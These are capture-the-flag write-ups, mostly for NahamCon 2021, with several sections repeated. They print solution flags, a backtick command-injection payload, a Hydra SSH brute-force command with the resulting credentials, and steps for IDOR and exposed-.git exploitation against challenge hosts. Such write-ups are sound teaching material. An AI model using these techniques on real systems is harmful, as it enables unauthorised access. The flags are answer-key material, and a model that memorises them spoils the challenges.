<https://static.googleusercontent.com/media/www.google.com/pt-BR//about/appsecurity/play-rewards/Android_app_vulnerability_classes.pdf> search for flag{ camouflage font `` flag{a0a6cb3b4bc98bf2a34b7aed76aebf53} `` ## Miscellaneous ### esab64 ```Bash$cat esab64mxWYntnZiVjMxEjY0kDOhZWZ4cjYxIGZwQmY2ATMxEzNlFjNl13X``` [Cyberchef](https://gchq.github.io/CyberChef/)Recipe: 1. Reverse2. From Base643. Reverse ### Shoelaces ```Bash$strings shoelaces.jpg``` `` flag{137288e960a3ae9b148e8a7db16a69b0} `` ### Pollex More than one jpg file concatenated to identify used binwalk and to remove the second file used dd. ```Bash$ binwalk pollex.jpg DECIMAL HEXADECIMAL DESCRIPTION--------------------------------------------------------------------------------0 0x0 JPEG image data, JFIF standard 1.0130 0x1E TIFF image data, little-endian offset of first image directory: 8334 0x14E JPEG image data, JFIF standard 1.01364 0x16C TIFF image data, little-endian offset of first image directory: 8848 0x350 JPEG image data, JFIF standard 1.016731 0x1A4B Copyright string: "CopyrightOwner> <rdf:Seq/> </plus:CopyrightOwner> <plus:Licensor> <rdf:Seq/> </plus:Licensor> <dc:creator> <rdf:Seq> <rdf:li>Ste"6765 0x1A6D Copyright string: "CopyrightOwner> <plus:Licensor> <rdf:Seq/> </plus:Licensor> <dc:creator> <rdf:Seq> <rdf:li>Stevanovic Igor</rdf:li> </rdf:Seq> <"``` ```Bashdd if=pollex.jpg bs=512k | { dd bs=334 count=1 of=/dev/null; dd bs=512k of=trimmed_pollex.jpg; }``` Flag printed on the image trimmed_pollex.jpg`` flag{65c34alec121a286600ddd48fe36bc00} `` ### buzz ```Bashfile buzz gunzip buzz``` ``flag{b3a33db7ba04c4c9052ea06d9ff17869}`` ### Veebee To decode the VBE script have tried: <https://didierstevens.com/files/software/decode-vbe_V0_0_1.zip> But didn't work Google-fu find the tool <https://github.com/JohnHammond/vbe-decoder/> `` flag{f805593d933f5433f2a04f082f400d8c} ``
# Challenges - [Challenges](#challenges) - [OSINT](#osint) - [#NahamCon2021](#nahamcon2021) - [Read the rules](#read-the-rules) - [Hackerone](#hackerone) - [Discord Nahansec](#discord-nahansec) - [Merch Store](#merch-store) - [INE](#ine) - [HTB](#htb) - [Googgle Play](#googgle-play) - [Miscellaneous](#miscellaneous) - [esab64](#esab64) - [Shoelaces](#shoelaces) - [Pollex](#pollex) - [buzz](#buzz) - [Veebee](#veebee) ## OSINT ### #NahamCon2021 Twitter (<https://twitter.com/NahamSec>)`` flag{e36bc5a67dd2fe5f33b62123f78fbcef} `` ### Read the rules <https://ctf.nahamcon.com/rules>HTML Source `` flag{90bc54705794a62015369fd8e86e557b} `` ### Hackerone Discord[announcements](https://discord.com/channels/514337135491416065/534475139602055168) ``Synt{rr907q188039nr543o81sq237o6o6q0o}`` [CyberChef](https://gchq.github.io/CyberChef/)Recipe:rot13`` Flag{ee907d188039ae543b81fd237b6b6d0b} `` ### Discord Nahansec Channel sub-title is the flag. - UHC-BR- Red Team Village- Live Recon Village- IoT Village- INE Career Corner- HTB Village ### Merch Store ### INE <https://checkout.ine.com/starter-pass> Page inspection = Deep on the page there's this base64 string ```Bashecho "ZmxhZ3syOWZhMzA1YWFmNWUwMWU5ZWRjZjAxNDJlNGRkY2RiOX0=" | base64 -d``` `` flag{29fa305aaf5e01e9edcf0142e4ddcdb9} `` ### HTB Dropped in parts over twitter and discord<https://twitter.com/hackthebox_eu/status/1371146586391261189><https://discord.com/channels/473760315293696010/477042310467813376> ``flag{57a3ca8be987fb8b7ea0a72e1124e302}`` ### Googgle Play Hint: <https://twitter.com/jon_bottarini/status/1370926690612826112> <https://static.googleusercontent.com/media/www.google.com/pt-BR//about/appsecurity/play-rewards/Android_app_vulnerability_classes.pdf> search for flag{ camouflage font `` flag{a0a6cb3b4bc98bf2a34b7aed76aebf53} `` ## Miscellaneous ### esab64 ```Bash$cat esab64mxWYntnZiVjMxEjY0kDOhZWZ4cjYxIGZwQmY2ATMxEzNlFjNl13X``` [Cyberchef](https://gchq.github.io/CyberChef/)Recipe: 1. Reverse2. From Base643. Reverse ### Shoelaces ```Bash$strings shoelaces.jpg``` `` flag{137288e960a3ae9b148e8a7db16a69b0} `` ### Pollex More than one jpg file concatenated to identify used binwalk and to remove the second file used dd. ```Bash$ binwalk pollex.jpg DECIMAL HEXADECIMAL DESCRIPTION--------------------------------------------------------------------------------0 0x0 JPEG image data, JFIF standard 1.0130 0x1E TIFF image data, little-endian offset of first image directory: 8334 0x14E JPEG image data, JFIF standard 1.01364 0x16C TIFF image data, little-endian offset of first image directory: 8848 0x350 JPEG image data, JFIF standard 1.016731 0x1A4B Copyright string: "CopyrightOwner> <rdf:Seq/> </plus:CopyrightOwner> <plus:Licensor> <rdf:Seq/> </plus:Licensor> <dc:creator> <rdf:Seq> <rdf:li>Ste"6765 0x1A6D Copyright string: "CopyrightOwner> <plus:Licensor> <rdf:Seq/> </plus:Licensor> <dc:creator> <rdf:Seq> <rdf:li>Stevanovic Igor</rdf:li> </rdf:Seq> <"``` ```Bashdd if=pollex.jpg bs=512k | { dd bs=334 count=1 of=/dev/null; dd bs=512k of=trimmed_pollex.jpg; }``` Flag printed on the image trimmed_pollex.jpg`` flag{65c34alec121a286600ddd48fe36bc00} `` ### buzz ```Bashfile buzz gunzip buzz``` ``flag{b3a33db7ba04c4c9052ea06d9ff17869}`` ### Veebee To decode the VBE script have tried: <https://didierstevens.com/files/software/decode-vbe_V0_0_1.zip> But didn't work Google-fu find the tool <https://github.com/JohnHammond/vbe-decoder/> `` flag{f805593d933f5433f2a04f082f400d8c} ``
# Challenges - [Challenges](#challenges) - [OSINT](#osint) - [#NahamCon2021](#nahamcon2021) - [Read the rules](#read-the-rules) - [Hackerone](#hackerone) - [Discord Nahansec](#discord-nahansec) - [Merch Store](#merch-store) - [INE](#ine) - [HTB](#htb) - [Googgle Play](#googgle-play) - [Miscellaneous](#miscellaneous) - [esab64](#esab64) - [Shoelaces](#shoelaces) - [Pollex](#pollex) - [buzz](#buzz) - [Veebee](#veebee) ## OSINT ### #NahamCon2021 Twitter (<https://twitter.com/NahamSec>)`` flag{e36bc5a67dd2fe5f33b62123f78fbcef} `` ### Read the rules <https://ctf.nahamcon.com/rules>HTML Source `` flag{90bc54705794a62015369fd8e86e557b} `` ### Hackerone Discord[announcements](https://discord.com/channels/514337135491416065/534475139602055168) ``Synt{rr907q188039nr543o81sq237o6o6q0o}`` [CyberChef](https://gchq.github.io/CyberChef/)Recipe:rot13`` Flag{ee907d188039ae543b81fd237b6b6d0b} `` ### Discord Nahansec Channel sub-title is the flag. - UHC-BR- Red Team Village- Live Recon Village- IoT Village- INE Career Corner- HTB Village ### Merch Store ### INE <https://checkout.ine.com/starter-pass> Page inspection = Deep on the page there's this base64 string ```Bashecho "ZmxhZ3syOWZhMzA1YWFmNWUwMWU5ZWRjZjAxNDJlNGRkY2RiOX0=" | base64 -d``` `` flag{29fa305aaf5e01e9edcf0142e4ddcdb9} `` ### HTB Dropped in parts over twitter and discord<https://twitter.com/hackthebox_eu/status/1371146586391261189><https://discord.com/channels/473760315293696010/477042310467813376> ``flag{57a3ca8be987fb8b7ea0a72e1124e302}`` ### Googgle Play Hint: <https://twitter.com/jon_bottarini/status/1370926690612826112> <https://static.googleusercontent.com/media/www.google.com/pt-BR//about/appsecurity/play-rewards/Android_app_vulnerability_classes.pdf> search for flag{ camouflage font `` flag{a0a6cb3b4bc98bf2a34b7aed76aebf53} `` ## Miscellaneous ### esab64 ```Bash$cat esab64mxWYntnZiVjMxEjY0kDOhZWZ4cjYxIGZwQmY2ATMxEzNlFjNl13X``` [Cyberchef](https://gchq.github.io/CyberChef/)Recipe: 1. Reverse2. From Base643. Reverse ### Shoelaces ```Bash$strings shoelaces.jpg``` `` flag{137288e960a3ae9b148e8a7db16a69b0} `` ### Pollex More than one jpg file concatenated to identify used binwalk and to remove the second file used dd. ```Bash$ binwalk pollex.jpg DECIMAL HEXADECIMAL DESCRIPTION--------------------------------------------------------------------------------0 0x0 JPEG image data, JFIF standard 1.0130 0x1E TIFF image data, little-endian offset of first image directory: 8334 0x14E JPEG image data, JFIF standard 1.01364 0x16C TIFF image data, little-endian offset of first image directory: 8848 0x350 JPEG image data, JFIF standard 1.016731 0x1A4B Copyright string: "CopyrightOwner> <rdf:Seq/> </plus:CopyrightOwner> <plus:Licensor> <rdf:Seq/> </plus:Licensor> <dc:creator> <rdf:Seq> <rdf:li>Ste"6765 0x1A6D Copyright string: "CopyrightOwner> <plus:Licensor> <rdf:Seq/> </plus:Licensor> <dc:creator> <rdf:Seq> <rdf:li>Stevanovic Igor</rdf:li> </rdf:Seq> <"``` ```Bashdd if=pollex.jpg bs=512k | { dd bs=334 count=1 of=/dev/null; dd bs=512k of=trimmed_pollex.jpg; }``` Flag printed on the image trimmed_pollex.jpg`` flag{65c34alec121a286600ddd48fe36bc00} `` ### buzz ```Bashfile buzz gunzip buzz``` ``flag{b3a33db7ba04c4c9052ea06d9ff17869}`` ### Veebee To decode the VBE script have tried: <https://didierstevens.com/files/software/decode-vbe_V0_0_1.zip> But didn't work Google-fu find the tool <https://github.com/JohnHammond/vbe-decoder/> `` flag{f805593d933f5433f2a04f082f400d8c} ``
# NahamCon_2021_CTF- [Scoreboard](#scoreboard) - [Warmups](#warmups) * [Veebee](#veebee) * [Read The Rules](#read-the-rules) * [Chicken Wings](#chicken-wings) * [Car Keys](#car-keys) * [Buzz](#buzz) * [Pollex](#pollex) * [Shoelaces](#shoelaces) * [esab64](#esab64) * [Eighth Circle](#eighth-circle)- [Web](#web) * [Homeward Bound](#homeward-bound) * [$Echo](#$Echo) * [Cereal and Milk](#cereal-and-milk) * [AgentTester](#agenttester) * [Asserted](#asserted) * [AgentTester V2](#agenttester-v2)- [Binary Exploitation](#binary-exploitation) * [Ret2basic](#ret2basic)- [Cryptography](#cryptography) * [Treasure](#treasure) * [eaxy](#eaxy) * [Dice Roll](#dice-roll)- [Forensics](#forensics) * [Parseltongue](#parseltongue) * [Henpeck](#henpeck)- [Mobile](#mobile) * [Andra](#andra) * [Resourceful](#resourceful) * [Microscopium](#microscopium)- [Miscellaneous](#miscellaneous) * [Abyss](#abyss) * [Prison Break](#prison-break)- [Scripting](#scripting) * [DDR](#ddr)- [Mission](#mission) * [Gus](#gus) * [Lyra](#lyra) * [Hercules](#hercules) * [Orion](#orion) * [Leo](#leo) * [Internal](#internal) * [Rotten Logging](#rotten-logging) * [Banking on it](#banking-on-it) * [Degrade](#degrade) * [Meet The Team](#meet-the-team) * [Bionic](#bionic) * [The Mission](#the-mission) * [Hydraulic](#hydraulic) * [Backdoor](#backdoor)- [Sponsors Recon](#sponsors-recon) * [Google Play](#google-play) * [Intigriti](#intigriti) * [INE (Starter Pass)](#ine--starter-pass-) * [HackerOne](#hackerone)- [HackTheBox Academy](#hackthebox-academy) * [HTB Module - Attacking Web Applications with Ffuf](#htb-module---attacking-web-applications-with-ffuf) * [HTB Challenge - Weather App](#htb-challenge---weather-app) * [HTB Challenge - Weather App](#htb-challenge---weather-app-1) ## Scoreboard ![](/images/nahamconscoreboard.png) We ended the CTF in 16th Place, which we were happy with as our first result as a team. ## Warmups ### Veebee `Buzz buzz, can you find the honey?` From the title of the challenge, I assumed that it was visual basic, so I renamed it to vbs, tried to run it, it failed. I googled Visual Basic file extensions and found .vbe, I ran it and it went through some popups until the flag appeared ![](/images/veebee.png) Flag: `flag{f805593d933f5433f2a04f082f400d8c}` ### Read The Rules ### Chicken Wings ### Car Keys ### Buzz ### Pollex ### Shoelaces ### esab64 ### Eighth Circle ## Web ### Homeward Bound ### $Echo `So I just made a` ~~hardcoded~~ `bot that basically tells you what you wanna hear. Now usually it's a $ for each thing you want it to say but I'll waive the fee for you if you beta test it for me.` $Echo was an easy web challenge that ended up at 50 points. We are presented with a text box that takes input, and uses the `echo` program to return our input. After trying to find command injection, we see that the only allowed special characters are \` and <./There was also a 15 character limit on input. After some research, i found that commands inside backticks would be executed, and the response returned.\`ls\` gave us the `index.php`, and \`ls .\.\` returned a `flag.txt` Due to the 15 character limit, it was impossible for us to use the cat command (e.g. \`cat .\./flag.txt`) so we had to find another way of reading the file. After research, i found that the < character could send input to stdout. This allowed the crafting of the final payload: \`< .\.\/flag.txt`which returned us a flag. ### Cereal and Milk ### AgentTester ### Asserted ### AgentTester V2 ## Binary Exploitation ### Ret2basic ## Cryptography ### Treasure `This movie is what pushed me to get into hacking. Good luck decrypting my note, I'm elite.` There are two files provided with the question: `notes.txt` and `hackers.txt` `note.txt` is a text document with a flag in a 4 digit numerical format `hackers.txt` is the script for the movie Hackers I thought it would be similar to a book cipher so I googled a book cipher decoder and clicked on the first link: [decode.fr/book-cipher](https://www.dcode.fr/book-cipher) I input the data into it and it returned the flag ![](/images/hackers.png) Flag: `flag{62D869C6B886DAC2DD743086E451F76B}` ### eaxy ### Dice Roll ## Forensics ### Parseltongue ### Henpeck ## Mobile ### Andra ### Resourceful ### Microscopium ## Miscellaneous ### Abyss ### Prison Break ## Scripting ### DDR ## Mission ### Gus ### Lyra ### Hercules ### Orion ### Leo ### Internal ### Rotten Logging ### Banking on it ### Degrade ### Meet The Team ### Bionic ### The Mission ### Hydraulic ### Backdoor ## Sponsors Recon ### Google Play ### Intigriti ### INE (Starter Pass) ### HackerOne ## HackTheBox Academy ### HTB Module - Attacking Web Applications with Ffuf ### HTB Challenge - Weather App ### HTB Challenge - Weather App ### HTP Module - Linux Fundamentals ### HTB Module - Introduction to Web Applications ### HTB Challenge - LoveTok ## NahamCon ### INE Career Corner ### IoT Village ### Live Recon Village ### Red Team Village ### UHC-BR ### #NahamCon2021 ### Merch Store
# Constellations Challenges unlocked by submitting flag. Overview ![Overview](img/OSINT_mermaid.png) - [Constellations](#constellations) - [The Mission](#the-mission) - [Bionic](#bionic) - [Gus](#gus) - [Hercules](#hercules) - [Meet The Team](#meet-the-team) - [Lyra](#lyra) - [Hydraulic](#hydraulic) ## [The Mission](https://ctf.nahamcon.com/mission) Flag on html source>Ctrl+u>>Ctrl+f "flag{" ``flag{48e117a1464c3202714dc9a350533a59}`` ### Bionic <https://constellations.page/> Source index has the following link to twitter witch have posted a flag ```HTMLhttps://twitter.com/C0NST3LLAT10NSflag{e483bffafbb0db5eabc121846b455bc7}``` link <https://github.com/constellations-git> ### Gus GitHub user gusrody is listed as member on constellations repo <https://github.com/gusrodry/development/blob/master/config/.ssh/flag.txt> - `` flag{84d5cc7e162895fa0a5834f1efdd0b32} `` .ssh folder has keys Is followed by HerculesScox ### Hercules <https://github.com/HerculesScox/maintenance/blob/main/connect.sh> - `` flag{5bf9da15002d7ea53cb487f31781ce47} `` Has hard corded credentials robots.txt ```txtDisallow: /meet-the-team.html``` ``flag{33b5240485dda77430d3de22996297a1}`` Enumerating root Tool: dirbuster Finding: .git/HEAD .git/config ```txt[user] name = Leo Rison email = [email protected]``` How to leverage the exposed git? [Google-fu](https://medium.com/swlh/hacking-git-directories-e0e60fa79a36) [Google-fu](https://github.com/internetwache/GitTools) ### Meet The Team Restored meet-the-team.html has the flag and lists PII. `` flag{4063962f3a52f923ddb4411c139dd24c} `` ### Lyra <https://twitter.com/LyraPatte> > IDOR>><https://constellations.page/constellations-documents/1/>>><https://constellations.page/constellations-documents/2/> <https://constellations.page/constellations-documents/5/> Has the flag and list of users, passwords. `` flag{bd869e6193c27308d2fd3ad4b427e8c3} `` ### Hydraulic Tool: Hydra [users](users) [passwords](passwords) ```Bash[31975][ssh] host: challenge.nahamcon.com login: pavo password: starsinthesky```
# Constellations Challenges unlocked by submitting flag. Overview ![Overview](img/OSINT_mermaid.png) - [Constellations](#constellations) - [The Mission](#the-mission) - [Bionic](#bionic) - [Gus](#gus) - [Hercules](#hercules) - [Meet The Team](#meet-the-team) - [Lyra](#lyra) - [Hydraulic](#hydraulic) ## [The Mission](https://ctf.nahamcon.com/mission) Flag on html source>Ctrl+u>>Ctrl+f "flag{" ``flag{48e117a1464c3202714dc9a350533a59}`` ### Bionic <https://constellations.page/> Source index has the following link to twitter witch have posted a flag ```HTMLhttps://twitter.com/C0NST3LLAT10NSflag{e483bffafbb0db5eabc121846b455bc7}``` link <https://github.com/constellations-git> ### Gus GitHub user gusrody is listed as member on constellations repo <https://github.com/gusrodry/development/blob/master/config/.ssh/flag.txt> - `` flag{84d5cc7e162895fa0a5834f1efdd0b32} `` .ssh folder has keys Is followed by HerculesScox ### Hercules <https://github.com/HerculesScox/maintenance/blob/main/connect.sh> - `` flag{5bf9da15002d7ea53cb487f31781ce47} `` Has hard corded credentials robots.txt ```txtDisallow: /meet-the-team.html``` ``flag{33b5240485dda77430d3de22996297a1}`` Enumerating root Tool: dirbuster Finding: .git/HEAD .git/config ```txt[user] name = Leo Rison email = [email protected]``` How to leverage the exposed git? [Google-fu](https://medium.com/swlh/hacking-git-directories-e0e60fa79a36) [Google-fu](https://github.com/internetwache/GitTools) ### Meet The Team Restored meet-the-team.html has the flag and lists PII. `` flag{4063962f3a52f923ddb4411c139dd24c} `` ### Lyra <https://twitter.com/LyraPatte> > IDOR>><https://constellations.page/constellations-documents/1/>>><https://constellations.page/constellations-documents/2/> <https://constellations.page/constellations-documents/5/> Has the flag and list of users, passwords. `` flag{bd869e6193c27308d2fd3ad4b427e8c3} `` ### Hydraulic Tool: Hydra [users](users) [passwords](passwords) ```Bash[31975][ssh] host: challenge.nahamcon.com login: pavo password: starsinthesky```
# UTCTF Adventure ROM Part 3 - The file is a Game Boy ROM and should run fine in most emulators.- You do not need to modify the game to win and make it print the flag -- you just need to play the game "correctly" Attachments:* [maze.gb](./maze.gb) ## Solution I used Ghidra with [GhidraBoy](https://github.com/Gekkio/GhidraBoy) plugin to load the binary. And for Dynamic Analysis I used [no$gmb](https://problemkaputt.de/gmb.htm) ### Main FunctionGot main function from analysis of `entry`.```cvoid main(void){ undefined2 uVar1; char extraout_E; char cVar2; byte extraout_E_00; uVar1 = FUN_1170(" \n UTCTF MAZE GAME\n BY GG\n\nPRESS START TO BEGIN"); cVar2 = extraout_E; do { read_key(); } while (-1 < cVar2); init_something(uVar1); do { print_on_screen(); read_input(extraout_E_00); idk_what(); } while( true );}``` ### `print_on_screen` function```c void print_on_screen(void){ // Variables if (check_data == 0) { // Print the maze/keys/etc } else { if (check_flag == 0) { print((byte *)"YOU LOST",5,3); print((byte *)"OOPS",7,4); print((byte *)"SORRY",6,5); print((byte *)"LMOA",7,6); } else { print((byte *)"A WINNER IS YOU",2,3); print((byte *)"CONGRATULATIONS",2,4); print((byte *)"THE FLAG IS",3,6); print((byte *)"UTFLAG ",2,7); // Decrypt Flag Data DAT_cd58 = 0; do { *(byte *)CONCAT11((0xa6 < DAT_cd58) + -0x33,DAT_cd58 + 0x59) = *(byte *)CONCAT11((0x2a < DAT_cd58) + -0x35,DAT_cd58 - 0x2b) ^ *(byte *)CONCAT11((0x32 < DAT_cd58) + -0x35,DAT_cd58 - 0x33); DAT_cd58 = DAT_cd58 + 1; } while (DAT_cd58 < 8); DAT_cd61 = 0; print(&DAT_cd59,9,7); print((byte *)" ",0x11,7); } } return;}```So it prints the maze till `check_data` is 0, if it's not then it will check `check_flag` then will print flag if it's ture. ### `read_input` function```cvoid read_input(byte param_1){ read_key(); DAT_cd68 = param_1; if ((DAT_cd68 & 2) != 0) { parse_input(-1,0); /*Left key*/ } if ((DAT_cd68 & 1) != 0) { parse_input(1,0); /*Right key*/ } if ((DAT_cd68 & 8) != 0) { parse_input(0,1); /*Up key*/ } if ((DAT_cd68 & 4) != 0) { parse_input(0,-1); /*Down key*/ } return;}``` ### `parse_input` functionTo cleanly understand this function I used dynamic analysis to clear the messy code given by ghidra.```cvoid parse_input(char x,char y){ byte chk; short tmp; if (check_data == 0) { new_x = pos_x + x; new_y = pox_y + y; if ((new_x < 50) && (new_y < 50)) { tmp = new_y * 50 + new_x; map_value = map_data[tmp]; if (map_value != 1) // 1 is wall, 0 is open area { pos_x = new_x; pox_y = new_y; if (map_value == 2) // 2 is key { tmp = new_y * 50 + new_x; if (tmp != check_pos[no_of_flag]) // Done with 2 8-bit registers { chk = 0; } check_flag = chk & check_flag; // 2 Functions (Not needed for our analysis) no_of_flag = no_of_flag + 1; if (no_of_flag == 10) { print_on_screen(); check_data = 1; } } } } }}```**Solution** While dynamic analysis I extracted those flag positions. Wrote a [script](./map_pos.py) to give the required order of getting flags.```[10, 32][0, 1][3, 49][13, 48][33, 49][25, 16][0, 12][46, 3][29, 40][25, 30]```So I plotted that in [Desmos](https://www.desmos.com/calculator) to get a visual representation, then hit the keys in this order and got the flag. ## Flag> utflag{vraq8c9a}
The area of the triangle created from 3 vertices in 3-space can be calculated using vectors. The area of a triangle with vertices at A, B, and C in 3-space can be calculated with the equation ![](https://chart.googleapis.com/chart?cht=tx&chl=area%20%3D%20\frac{1}{2}||\vec{AB}%20\times%20\vec{AC}||) where ![](https://chart.googleapis.com/chart?cht=tx&chl=\vec{AB}) is the vector from vertex A to B, ![](https://chart.googleapis.com/chart?cht=tx&chl=\vec{AC}) is the vector from A to C, and ![](https://chart.googleapis.com/chart?cht=tx&chl=\|\|\vec{AB}%20\times%20\vec{AC}\|\|) is the norm of the cross product of vectors AB and AC. We perform this calculation for all 3 vertex combinations in the given coordinates, and return the largest area found. [triangle.py](https://gitlab.com/malcrypt/ctf-archive/-/blob/master/2021/tenable/code/triangle/triangle.py) implements this solution.
# Constellations Challenges unlocked by submitting flag. Overview ![Overview](img/OSINT_mermaid.png) - [Constellations](#constellations) - [The Mission](#the-mission) - [Bionic](#bionic) - [Gus](#gus) - [Hercules](#hercules) - [Meet The Team](#meet-the-team) - [Lyra](#lyra) - [Hydraulic](#hydraulic) ## [The Mission](https://ctf.nahamcon.com/mission) Flag on html source>Ctrl+u>>Ctrl+f "flag{" ``flag{48e117a1464c3202714dc9a350533a59}`` ### Bionic <https://constellations.page/> Source index has the following link to twitter witch have posted a flag ```HTMLhttps://twitter.com/C0NST3LLAT10NSflag{e483bffafbb0db5eabc121846b455bc7}``` link <https://github.com/constellations-git> ### Gus GitHub user gusrody is listed as member on constellations repo <https://github.com/gusrodry/development/blob/master/config/.ssh/flag.txt> - `` flag{84d5cc7e162895fa0a5834f1efdd0b32} `` .ssh folder has keys Is followed by HerculesScox ### Hercules <https://github.com/HerculesScox/maintenance/blob/main/connect.sh> - `` flag{5bf9da15002d7ea53cb487f31781ce47} `` Has hard corded credentials robots.txt ```txtDisallow: /meet-the-team.html``` ``flag{33b5240485dda77430d3de22996297a1}`` Enumerating root Tool: dirbuster Finding: .git/HEAD .git/config ```txt[user] name = Leo Rison email = [email protected]``` How to leverage the exposed git? [Google-fu](https://medium.com/swlh/hacking-git-directories-e0e60fa79a36) [Google-fu](https://github.com/internetwache/GitTools) ### Meet The Team Restored meet-the-team.html has the flag and lists PII. `` flag{4063962f3a52f923ddb4411c139dd24c} `` ### Lyra <https://twitter.com/LyraPatte> > IDOR>><https://constellations.page/constellations-documents/1/>>><https://constellations.page/constellations-documents/2/> <https://constellations.page/constellations-documents/5/> Has the flag and list of users, passwords. `` flag{bd869e6193c27308d2fd3ad4b427e8c3} `` ### Hydraulic Tool: Hydra [users](users) [passwords](passwords) ```Bash[31975][ssh] host: challenge.nahamcon.com login: pavo password: starsinthesky```
# Hydraulic ## The brief```This is Stage 2 of Path 5 in The Mission. After solving this challenge, you may need to refresh the page to see the newly unlocked challenges. Gain access with the information you have gathered thus far and retrieve the flag. You may bruteforce this challenge... hence the name ;) Press the Start button on the top-right to begin this challenge.```The hint and the previously gathered info should make this really easy. ## Logging in We are supposed to ssh in: `ssh -p 30946 challenge.nahamcon.com`. But as who and how? Well we have some lists from `Lyra`. And what rhymes with `Hydraulic`? `Hydra`! Wait... that's not how rhyming works... ## Hydra Hydra is a credential bruteforcing tool that we will use as follows:```hydra -L users -P wordlist ssh://challenge.nahamcon.com:30946 -L users => L denotes a list of users; l would be a single username -P wordlist => P denotes a list of passwords; p would be a single password ssh:// => the service challenge.nahamcon.com => the host :30946 => the port```So what wordlists shall we use? Think back to `Lyra`! We have these:```passwords: starstarallstarsstarstruckstarshinestarskypopstarsstarshipbluestarspinkstarssuperstarsilovestarsrockstarsthestarsstarscreamgostarsshootingstarsnorthstarsalpinestarsstarsignmoonandstarsstarsrockluckystarsiluvstarsfivestarsredstarsmystarslovestarsdallasstarsmoonstarssunmoonstarsstarsailorsilverstarssevenstarslilstarsdotaallstarssunstarsstarsunstarsstarsstarsareblindpokerstarsmagicstarsdivastarsblackstarsstarstarstarstarsearchluvstarsgreenstarsdeathstarsbrightstarstwinstarsstarsintheskystarshooterstarshathreestarssummerstarsstarspiritstarshollowstarsandstripesstarsandmoonsnightstarsmetrostarsicstarshoodstarsdeadstarscitystars``````users: orionpavogusvelaherculesleolyragemini```Now some of you may have just tried with `lyra`, but that is not the user we will login as. ## Getting the flag: After just a little bit of time this appears:```[32432][ssh] host: challenge.nahamcon.com login: pavo password: starsinthesky```So ssh over:```ssh -p 32432 [email protected] [email protected]'s password: starsinthesky```And then?```bashpavo@hydraulic-6cd1af33c856d4b5-6f5bb8b867-q9fgh:~$ lsflag.txtpavo@hydraulic-6cd1af33c856d4b5-6f5bb8b867-q9fgh:~$ cat flag.txtflag{cadbbfd75d2547700221f8c2588e026e}```There it is!
## beginner ### stringy thingsDescription:*I know there's a string in this binary somewhere.... Now where did I leave it?* We get a calc file. lets use the command 'file' to see what it actually is:```shell~/Downloads$ file calccalc: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=8be49a90c694a4f14dd0735d7ad2ffb200753cfb, for GNU/Linux 3.2.0, not stripped```So an ELF file is an executable in Linux. It gets generated after it has been through the complile and build process in an SDK (Software Development Kit) So generallty we can read all files in Linux so lets see what it shows us.```shell~/Downloads$ cat calc ELF>`@:@8 @@@@h����� ���-�=�=X`�-�=�=����DDP�td� � � 44Q�tdR�td�-�=�=/lib64/ld-linux-x86-64.so.2GNU�䚐Ɣ��M�s]z���u<�GNUs !7� � `� � !�=�=�=�?@0@@@��P��=�������!����=��=��=�� @�Y��@@ 7"abi-note.c__abi_taginit.ccrtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.0__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entrycalc.c__FRAME_END____init_array_end_DYNAMIC__init_array_start__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___libc_csu_fini_ITM_deregisterTMCloneTable_edata__stack_chk_fail@@GLIBC_2.4printf@@GLIBC_2.2.5__libc_start_main@@GLIBC_2.2.5__data_start__gmon_start____dso_handle_IO_stdin_used__libc_csu_init__bss_startmain__isoc99_scanf@@GLIBC_2.7__TMC_END___ITM_registerTMCloneTable__cxa_finalize@@GLIBC_2.2.5.symtab.strtab.shstrtab.interp.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.got.got.plt.data.bss.comment�#��$6�� D�N�o� �� � 4�!!������=�-��?��@�0@0@@@�0@0X0`5��� �6S```This is only part of the file but it gives us an idea but is not an easy way to read and doesn't really give us any clues. Having read it with cat, we notice that it gives us a mix of human and other character types. With the title hinting towards the 'strings' command. Let's give that a go. From the man page:*_strings_ is mainly useful for determining the contents of non-text files. ... _strings_(1) - Linux man page. Name. strings- print the strings of printable characters in files.* ```shell~/Downloads$ strings calc/lib64/ld-linux-x86-64.so.2__isoc99_scanf__stack_chk_failprintf__cxa_finalize__libc_start_mainlibc.so.6GLIBC_2.7GLIBC_2.2.5GLIBC_2.4_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTableu3UH[]A\A]A^A_Enter an operator (+, -, *,): Enter two operands: %lf %lf%.1lf + %.1lf = %.1lf%.1lf - %.1lf = %.1lf%.1lf * %.1lf = %.1lf%.1lf / %.1lf = %.1lfError! operator is not correct``` Now that is easier to read as it is by line. However there are 87 lines to look through and the types of file can contain thousands of lines. What we can use is a command that will help us look for patterns. In this case 'grep'Again utilising the man page:*The _grep_ utility shall search the input files, selecting lines matching one or more patterns; the types of patterns are controlled by the options specified.* OK Can we just 'grep' the file calc? Yes we could and it would give us the same answer. But since we have already used 'strings', lets take that output and put it into 'grep'. To do this in Linux, we 'pipe' it from one command into another.*strings | grep* One more thing. Now grep is used to find patterns but we need to give it some options. Generally we know the CTF flag stype and in this case it is utflag{} with words between the brackets. That being the case we can ask 'grep' to search for this pattern and if we generalise the characters withing it (i.e. search for anything in there) then we should be able to print off the flag. ```shell~/Downloads$ strings calc | grep -oE utflag{.?*}utflag{strings_is_op}```- -o, --only-matching (show only nonempty parts of lines that match)- -E, --extended-regexp (PATTERNS are extended regular expressions) As I mentioned we can do this to the file so the command is still the same, less strings but adding the file name.```shell~/Downloads$ grep -oEa utflag{.?*} calc utflag{strings_is_op}``` And finally we can actually use 'cat'. The only difference is that his time, we need to tell 'grep' that we are reading as text.```shell~/Downloads$ cat calc | grep -oE utflag{.?*}Binary file (standard input) matches```Here without -a it tells us it finds a match in a binary file.```~/Downloads$ cat calc | grep -oEa utflag{.?*}utflag{strings_is_op}``` Adding the additional option of -a now finds the flag. - -a, --text (equivalent to --binary-files=text) ### HTMLDescription:*I hid a flag somewhere in the code of the UTCTF website, can you find it?* We get a link to the website. https://www.isss.io/utctf/ Lets look at the source code and bang!! We have the flag. ![](./images/utctf001a.png) utflag{you_found_me_0123959} ### Magic BytesDescription:*My friend sent me this text file and said they put a flag inside. I opened it and it doesn't look like a normal text file to me! Maybe you'll be able to find it.* We get a .txt file. Again lets check it out with 'file' 